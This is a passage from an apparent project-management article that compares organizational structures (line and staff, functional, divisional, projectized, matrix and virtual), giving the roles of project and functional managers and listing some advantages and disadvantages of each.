The Line and Staff Organization is a modification of the Line Organization. Here, functional specialists work with line managers to guide and advise them.
This structure is more common in the present day, and most of the larger enterprises adopt this type of setup.
The staff consists of two categories: the general staff and the specialized staff.
- General Staff: The general staff consists of ordinary employees who assist the top management. These staff aren't experts.
- Specialized Staff: This team consists of experts that offer services to the organization. Their roles can be advisory, control (as in quality control), or service (such as maintenance). The Line and Staff Organization uses the expertise of specialists. So the line managers become better in several fields.
Advantages:

1) Staff can make quality decisions, get support from specialists, and enjoy better coordination.

2) Staff get training to enhance their skills and the opportunity to work in research & development.

Disadvantages:

1) Increased confusion and conflicts among the staff

2) Higher costs of hiring specialists

3) A tendency for staff to develop a personal image within the group
4. Functional Organization
The Functional Organization groups workers based on their area of specialization. This structure is an extension of the Line Organization. The functional manager leads the team and manages all the operations or businesses.
The Functional Organization manager enforces directives within a clearly defined scope of authority. This concept originated with Frederick W. Taylor.
Here you classify workers according to their functional roles and department. Some of the general departments under this are
- Customer service
- Supply Chain, etc.,
The organization's head is the president, followed by the vice president, and the chain goes on. Furthermore, the leaders of departments oversee their departmental performance, so they collectively help the organization control quality and uniformity.

The structure positions departments vertically and disconnected from the others. Hence the name “silos.” The department heads manage communication between top management and their subordinates.

The project manager has a minimal role to play or may not have a designated position. Generally, you'll play the role of an expediter or work as a coordinator. As a functional manager, on the other hand, you'll deal with
- Budget allocation
- Resource allocation, and
- Decision making
This type of organization is suitable for manufacturing or engineering companies. It supports ongoing operations and practices for producing standard products.
You may also like: 108 Project Management Statistics to Help You Ensure Project Success
5. Divisional Organization
This type of organization often resembles a Functional Organization. The team members work in different departments. This setup splits the employees into segments based on products, markets, or services.
However, the divisional organization's segments or divisions are autonomous. Functional units that support this structure include:
- R & D department, and
- Personnel, etc.
This design focuses on service lines like products, customers, area, and time. Since they operate as small organizations, they're called “self-contained structures.”
So they work independently on divisional goals. But all divisions collectively meet the organizational policies and business objectives.
This type of organization is suitable for companies that
- Operate in different geographical locations,
- Have chain stores with subsidiaries, and
- Run banking and insurance businesses
Here, the project managers may or may not exist or may be hired on temporary assignments.
Its main disadvantage is that this structure affects the integration of the organization as a whole.
6. Project Organization
Project organization is a temporary setup formed for specific projects. It's also called “projectized organizational structure.” The project manager assigned for the project is the head of this structure.
Once the project is complete, you may choose to dismantle this setup or move it to form a new project. In the case of a new project, the project manager might have to reshuffle the staff to fit the new plan. You’ll hire resources or specialists from different functional departments.
As a project manager, you can use the allotted resources until completion and closeout. You are accountable for all the activities and the timely completion of the project. In other words, you must spend within the project budget.
The manager assigns clearly defined tasks to each of the team members, along with the complete schedule.
These types of organizations are useful when:
- The project scope is complete, and objectives are clearly defined
- The project is unique and independent
7. Matrix Organization
This one combines the projectized and the functional organization. This hybrid overcomes the limitations of each. Here, both the functional and project managers share their respective authorities.
Project managers are generally responsible for
- Overall integration
- Project planning
- Execution of the project, and
- Completion of project activities
All activities must be done using the assigned resources.
The functional managers are concerned with the operational aspects of the project. They’re also responsible for providing technical guidance.
The functional staff specializes in the skills required for the project. Though project managers manage the project staff, functional managers control the process.
This type of organization is most useful when workers must share available resources. The combination achieves high efficiency and better usage of available resources, and it adapts better to changing trends.
You can further classify the Matrix Organization into Strong and Weak forms. The authority level that the functional and project managers share determines its strength: in a strong matrix, the project manager holds more of the authority; in a weak matrix, the functional manager does.
You may also like: 5 Trends That Are Shaping Project Management Plans in 2021
8. Virtual Organization
A virtual organization is a recent development that involves different locations. When your team executes a project in one area, you can manage it from any other place. So you can distribute resources to your project team regardless of location.
You can connect all the locations virtually. The other names for this organizational structure are:
- Digital organization
- Network organization, or
- Modular organization
ICT (Information and Communication Technology) is the backbone of virtual organizations. This organization is a social network without vertical and horizontal boundaries.
Resources aren't tied to a particular workstation (desk). Also, you can work from any mobile device. You can manage every project activity, including meetings, virtually.
The team reports digitally, except on the few occasions that require physical meetings. Hence, it's common to hear of virtual offices, virtual teams, and virtual leadership.
This setup is most suitable for software or IT companies.
Advantages:

1) Faster and more cost-effective, as there are no boundaries to work and communication

2) Lower operating costs, as no permanent setup is required (no need for office premises)

3) Flexible options like flexitime, part-time work, job-sharing, and home-based working, hence increased employee satisfaction and efficiency

4) Access to a larger talent pool

Disadvantages:

1) No physical contact or communication, thus weaker team integrity

2) Difficult to restrict information sharing, as locations are dispersed

3) Resources must be spread across various locations and time zones

4) Resources require training for virtual interaction

5) Different time zones cause delayed responses
With these different types of organizational structures in mind, it's easier to know what you need. Though each structure has its limitations, large and complex organizations tend to adopt the matrix organization. The line and staff organization has a direct and straightforward hierarchy, so it's used in simple organizations, while software and information technology businesses often adopt virtual organizations. Ultimately, choosing the right organization type helps ensure that you do well in the market.